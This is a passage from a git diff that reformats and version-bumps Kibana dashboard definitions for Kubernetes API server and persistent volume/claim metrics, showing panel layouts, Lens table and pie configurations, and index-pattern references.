"cad0c9f5-09c6-405b-8801-5177891c830a", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.apiserver.request.resource" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "aba71622-b1dc-4b3c-b7c0-c9212af90472", + "layerType": "data", + "legendDisplay": "default", + "metrics": [ + "cad0c9f5-09c6-405b-8801-5177891c830a" + ], + "nestedLegend": false, + "numberDisplay": "value", + "primaryGroups": [ + "f66894ae-0dbb-4132-838b-04725a5ae7bf" + ] + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "481678b8-e443-4433-ad15-b55eaab7c8f4:indexpattern-datasource-layer-aba71622-b1dc-4b3c-b7c0-c9212af90472", - "type": "index-pattern" + "title": "Apiserver Stored Objects per Resource [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 23, + "i": "9f255e7f-b213-4719-9c00-eedc2a919e2c", + "w": 24, + "x": 0, + "y": 26 }, - { - "id": "metrics-*", - "name": "9f255e7f-b213-4719-9c00-eedc2a919e2c:indexpattern-datasource-layer-fc6561f2-f85f-4096-86df-ef5dcb95627c", - "type": "index-pattern" - } + "panelIndex": "9f255e7f-b213-4719-9c00-eedc2a919e2c", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-fc6561f2-f85f-4096-86df-ef5dcb95627c", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "fc6561f2-f85f-4096-86df-ef5dcb95627c": { + "columnOrder": [ + "2a873e10-31f0-4b48-abc0-5c2c0efa8aed", + "a5d3264f-b070-4a5e-a62c-659c410e9a64", + "414b7d77-a53c-4043-9690-4e3b000980be" + ], + "columns": { + "2a873e10-31f0-4b48-abc0-5c2c0efa8aed": { + "dataType": "string", + "isBucketed": true, + "label": "Top 5 values of kubernetes.apiserver.request.subresource", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "414b7d77-a53c-4043-9690-4e3b000980be", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "kubernetes.apiserver.request.subresource" + }, + "414b7d77-a53c-4043-9690-4e3b000980be": { + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.apiserver.request.count: *" + }, + "isBucketed": false, + "label": "Last value of kubernetes.apiserver.request.count", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.apiserver.request.count" + }, + "a5d3264f-b070-4a5e-a62c-659c410e9a64": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of kubernetes.apiserver.request.resource", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "414b7d77-a53c-4043-9690-4e3b000980be", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.apiserver.request.resource" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "fc6561f2-f85f-4096-86df-ef5dcb95627c", + "layerType": "data", + "legendDisplay": "default", + "metrics": [ + "414b7d77-a53c-4043-9690-4e3b000980be" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "2a873e10-31f0-4b48-abc0-5c2c0efa8aed", + "a5d3264f-b070-4a5e-a62c-659c410e9a64" + ] + } + ], + "shape": "treemap" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Apiserver Requests per Resource and SubResource [Metrics Kubernetes]" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics Kubernetes] API server", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "9db496f9-079b-4ddd-b517-cec815a7e9cb:indexpattern-datasource-layer-8df21ece-205d-4542-bec9-e381eca92895", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "97d844d4-e990-444a-8b94-34aa4dcd64cc:indexpattern-datasource-layer-8df21ece-205d-4542-bec9-e381eca92895", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "481678b8-e443-4433-ad15-b55eaab7c8f4:indexpattern-datasource-layer-aba71622-b1dc-4b3c-b7c0-c9212af90472", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "9f255e7f-b213-4719-9c00-eedc2a919e2c:indexpattern-datasource-layer-fc6561f2-f85f-4096-86df-ef5dcb95627c", + "type": "index-pattern" + } + ], + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/kubernetes/kibana/dashboard/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013.json b/packages/kubernetes/kibana/dashboard/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013.json index a3b2c7ae750..1093b0d5930 100644 --- a/packages/kubernetes/kibana/dashboard/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013.json +++ b/packages/kubernetes/kibana/dashboard/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013.json @@ -1,534 +1,544 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "twoLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"4623b3fb-e2bc-4f1e-8cd3-0f0a753a171e\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"4623b3fb-e2bc-4f1e-8cd3-0f0a753a171e\",\"enhancements\":{}}},\"24514d41-0fa1-4fc5-96a1-6297453134bd\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.persistentvolume.name\",\"title\":\"Persistent Volume Name\",\"id\":\"24514d41-0fa1-4fc5-96a1-6297453134bd\",\"selectedOptions\":[],\"enhancements\":{}}},\"16f1ca8d-0221-4df5-ae59-42a0e0f92992\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.persistentvolumeclaim.name\",\"title\":\"Persistent Volume Claim Name\",\"id\":\"16f1ca8d-0221-4df5-ae59-42a0e0f92992\",\"selectedOptions\":[],\"enhancements\":{}}}}" + "id": "kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-03-13T10:46:00.096Z", + "created_at": "2024-03-13T10:46:00.096Z", + "version": "WzI1NCwyXQ==", + "attributes": { + "controlGroupInput": { + "controlStyle": "twoLine", + "chainingSystem": "HIERARCHICAL", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"4623b3fb-e2bc-4f1e-8cd3-0f0a753a171e\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"4623b3fb-e2bc-4f1e-8cd3-0f0a753a171e\",\"enhancements\":{}}},\"24514d41-0fa1-4fc5-96a1-6297453134bd\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.persistentvolume.name\",\"title\":\"Persistent Volume Name\",\"id\":\"24514d41-0fa1-4fc5-96a1-6297453134bd\",\"selectedOptions\":[],\"enhancements\":{}}},\"16f1ca8d-0221-4df5-ae59-42a0e0f92992\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.persistentvolumeclaim.name\",\"title\":\"Persistent Volume Claim Name\",\"id\":\"16f1ca8d-0221-4df5-ae59-42a0e0f92992\",\"selectedOptions\":[],\"enhancements\":{}}}}" + }, + "description": "Metrics about Persistent Volumes and Persistent Volume Claims", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 4, + "i": "14993ee2-7277-4012-946c-fa294f024a39", + "w": 48, + "x": 0, + "y": 0 }, - "description": "Metrics about Persistent Volumes and Persistent Volume Claims", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { + "panelIndex": "14993ee2-7277-4012-946c-fa294f024a39", + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + }, + "type": "visualization" }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "title": "Kubernetes Dashboards [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "e6032561-b325-41fe-b7f5-6b167d58dc18", + "w": 48, + "x": 0, + "y": 4 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "panelIndex": "e6032561-b325-41fe-b7f5-6b167d58dc18", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-e8ede311-8955-4a16-bf44-8c0ff0e0104b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1b2422f5-7bbd-4173-ae8f-17b87d3dbd29", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e8ede311-8955-4a16-bf44-8c0ff0e0104b": { + "columnOrder": [ + "8d5b3307-5817-411c-a1a4-dc2cc0a8b08c", + "98d34e0f-186a-47a7-8fa3-de5123d43616", + "420939ad-d9f0-43ee-a1a6-9b9fe5509086", + "546bc1ba-c988-42f6-9d4d-3da5f21cff36" + ], + "columns": { + "420939ad-d9f0-43ee-a1a6-9b9fe5509086": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Capacity", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 0 + } + }, + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.persistentvolume.capacity.bytes" }, - "description": "", - "params": { - "fontSize": 10, - "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", - "openLinksInNewTab": false + "546bc1ba-c988-42f6-9d4d-3da5f21cff36": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Storage Class", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.persistentvolume.storage_class" }, - "title": "", - "type": "markdown", - "uiState": {} - } - }, - "gridData": { - "h": 4, - "i": "14993ee2-7277-4012-946c-fa294f024a39", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "14993ee2-7277-4012-946c-fa294f024a39", - "title": "Kubernetes Dashboards [Metrics Kubernetes]", - "type": "visualization", - "version": "8.6.0-SNAPSHOT" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-e8ede311-8955-4a16-bf44-8c0ff0e0104b", - "type": "index-pattern" + "8d5b3307-5817-411c-a1a4-dc2cc0a8b08c": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - { - "id": "metrics-*", - "name": "1b2422f5-7bbd-4173-ae8f-17b87d3dbd29", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "e8ede311-8955-4a16-bf44-8c0ff0e0104b": { - "columnOrder": [ - "8d5b3307-5817-411c-a1a4-dc2cc0a8b08c", - "98d34e0f-186a-47a7-8fa3-de5123d43616", - "420939ad-d9f0-43ee-a1a6-9b9fe5509086", - "546bc1ba-c988-42f6-9d4d-3da5f21cff36" - ], - "columns": { - "420939ad-d9f0-43ee-a1a6-9b9fe5509086": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Capacity", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 0 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.persistentvolume.capacity.bytes" - }, - "546bc1ba-c988-42f6-9d4d-3da5f21cff36": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Storage Class", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.persistentvolume.storage_class" - }, - "8d5b3307-5817-411c-a1a4-dc2cc0a8b08c": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.persistentvolume.name" - }, - "98d34e0f-186a-47a7-8fa3-de5123d43616": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Phase", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.persistentvolume.phase" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "1b2422f5-7bbd-4173-ae8f-17b87d3dbd29", - "key": "data_stream.dataset", - "negate": false, - "params": [ - "kubernetes.state_persistentvolume", - "kubernetes.state_persistentvolumeclaim" - ], - "type": "phrases", - "value": [ - "kubernetes.state_persistentvolume", - "kubernetes.state_persistentvolumeclaim" - ] - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_persistentvolume" - } - }, - { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_persistentvolumeclaim" - } - } - ] - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "columns": [ - { - "columnId": "8d5b3307-5817-411c-a1a4-dc2cc0a8b08c", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "98d34e0f-186a-47a7-8fa3-de5123d43616", - "isTransposed": false - }, - { - "columnId": "420939ad-d9f0-43ee-a1a6-9b9fe5509086", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "546bc1ba-c988-42f6-9d4d-3da5f21cff36", - "isTransposed": false - } - ], - "layerId": "e8ede311-8955-4a16-bf44-8c0ff0e0104b", - "layerType": "data", - "rowHeight": "single", - "rowHeightLines": 1 - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.persistentvolume.name" }, - "title": "Persistent Volumes Informations [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsDatatable" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 9, - "i": "e6032561-b325-41fe-b7f5-6b167d58dc18", - "w": 48, - "x": 0, - "y": 4 - }, - "panelIndex": "e6032561-b325-41fe-b7f5-6b167d58dc18", - "title": "Persistent Volumes Informations [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "98d34e0f-186a-47a7-8fa3-de5123d43616": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Phase", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.persistentvolume.phase" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "1b2422f5-7bbd-4173-ae8f-17b87d3dbd29", + "key": "data_stream.dataset", + "negate": false, + "params": [ + "kubernetes.state_persistentvolume", + "kubernetes.state_persistentvolumeclaim" + ], + "type": "phrases", + "value": [ + "kubernetes.state_persistentvolume", + "kubernetes.state_persistentvolumeclaim" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_persistentvolume" + } + }, + { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_persistentvolumeclaim" + } + } + ] + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "8d5b3307-5817-411c-a1a4-dc2cc0a8b08c", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "98d34e0f-186a-47a7-8fa3-de5123d43616", + "isTransposed": false + }, + { + "columnId": "420939ad-d9f0-43ee-a1a6-9b9fe5509086", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "546bc1ba-c988-42f6-9d4d-3da5f21cff36", + "isTransposed": false + } + ], + "layerId": "e8ede311-8955-4a16-bf44-8c0ff0e0104b", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-e8ede311-8955-4a16-bf44-8c0ff0e0104b", - "type": "index-pattern" + "title": "Persistent Volumes Informations [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Persistent Volumes Informations [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "e03df747-8a68-4d68-a958-1f0e38218859", + "w": 48, + "x": 0, + "y": 13 + }, + "panelIndex": "e03df747-8a68-4d68-a958-1f0e38218859", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-e8ede311-8955-4a16-bf44-8c0ff0e0104b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2503a179-a67c-4db4-a091-84e1d54aa5a9", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e8ede311-8955-4a16-bf44-8c0ff0e0104b": { + "columnOrder": [ + "7b08988e-0df9-450c-89d0-b1d71c49a7ec", + "b15e8116-d875-4e7f-97f5-448ab367e5e1", + "1398ca11-cb70-4d9d-bacf-b402bf000905", + "457a059e-0824-4109-9178-6802eed70599", + "388ad9b8-3fec-4e8d-9a13-d950d646bd5b", + "6f4b28cd-dd85-41da-9921-af5faf9f33f8" + ], + "columns": { + "1398ca11-cb70-4d9d-bacf-b402bf000905": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Volume", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.persistentvolumeclaim.volume_name" + }, + "388ad9b8-3fec-4e8d-9a13-d950d646bd5b": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Access Mode", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.persistentvolumeclaim.access_mode" + }, + "457a059e-0824-4109-9178-6802eed70599": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Capacity", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 0 + } }, - { - "id": "metrics-*", - "name": "2503a179-a67c-4db4-a091-84e1d54aa5a9", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "e8ede311-8955-4a16-bf44-8c0ff0e0104b": { - "columnOrder": [ - "7b08988e-0df9-450c-89d0-b1d71c49a7ec", - "b15e8116-d875-4e7f-97f5-448ab367e5e1", - "1398ca11-cb70-4d9d-bacf-b402bf000905", - "457a059e-0824-4109-9178-6802eed70599", - "388ad9b8-3fec-4e8d-9a13-d950d646bd5b", - "6f4b28cd-dd85-41da-9921-af5faf9f33f8" - ], - "columns": { - "1398ca11-cb70-4d9d-bacf-b402bf000905": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Volume", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.persistentvolumeclaim.volume_name" - }, - "388ad9b8-3fec-4e8d-9a13-d950d646bd5b": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Access Mode", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.persistentvolumeclaim.access_mode" - }, - "457a059e-0824-4109-9178-6802eed70599": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Capacity", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 0 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.persistentvolumeclaim.request_storage.bytes" - }, - "6f4b28cd-dd85-41da-9921-af5faf9f33f8": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Storage Class", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.persistentvolumeclaim.storage_class" - }, - "7b08988e-0df9-450c-89d0-b1d71c49a7ec": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.persistentvolumeclaim.name" - }, - "b15e8116-d875-4e7f-97f5-448ab367e5e1": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Phase", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.persistentvolumeclaim.phase" - } - }, - "incompleteColumns": {} - } - } - } + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.persistentvolumeclaim.request_storage.bytes" + }, + "6f4b28cd-dd85-41da-9921-af5faf9f33f8": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Storage Class", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.persistentvolumeclaim.storage_class" + }, + "7b08988e-0df9-450c-89d0-b1d71c49a7ec": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "2503a179-a67c-4db4-a091-84e1d54aa5a9", - "key": "data_stream.dataset", - "negate": false, - "params": [ - "kubernetes.state_persistentvolume", - "kubernetes.state_persistentvolumeclaim" - ], - "type": "phrases", - "value": [ - "kubernetes.state_persistentvolume", - "kubernetes.state_persistentvolumeclaim" - ] - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_persistentvolume" - } - }, - { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_persistentvolumeclaim" - } - } - ] - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "columns": [ - { - "alignment": "left", - "columnId": "7b08988e-0df9-450c-89d0-b1d71c49a7ec", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "b15e8116-d875-4e7f-97f5-448ab367e5e1", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "1398ca11-cb70-4d9d-bacf-b402bf000905", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "6f4b28cd-dd85-41da-9921-af5faf9f33f8", - "isTransposed": false - }, - { - "columnId": "457a059e-0824-4109-9178-6802eed70599", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "388ad9b8-3fec-4e8d-9a13-d950d646bd5b", - "isTransposed": false - } - ], - "layerId": "e8ede311-8955-4a16-bf44-8c0ff0e0104b", - "layerType": "data", - "rowHeight": "single", - "rowHeightLines": 1 - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.persistentvolumeclaim.name" }, - "title": "Persistent Volume Claims Informations [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsDatatable" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 9, - "i": "e03df747-8a68-4d68-a958-1f0e38218859", - "w": 48, - "x": 0, - "y": 13 - }, - "panelIndex": "e03df747-8a68-4d68-a958-1f0e38218859", - "title": "Persistent Volume Claims Informations [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0-SNAPSHOT" - } - ], - "timeRestore": false, - "title": "[Metrics Kubernetes] PV/PVC", - "version": 1 - }, - "coreMigrationVersion": "8.6.0", - "created_at": "2023-01-11T14:23:21.848Z", - "id": "kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013", - "migrationVersion": { - "dashboard": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "e6032561-b325-41fe-b7f5-6b167d58dc18:indexpattern-datasource-layer-e8ede311-8955-4a16-bf44-8c0ff0e0104b", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "e6032561-b325-41fe-b7f5-6b167d58dc18:1b2422f5-7bbd-4173-ae8f-17b87d3dbd29", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "e03df747-8a68-4d68-a958-1f0e38218859:indexpattern-datasource-layer-e8ede311-8955-4a16-bf44-8c0ff0e0104b", - "type": "index-pattern" - }, - { - "id": 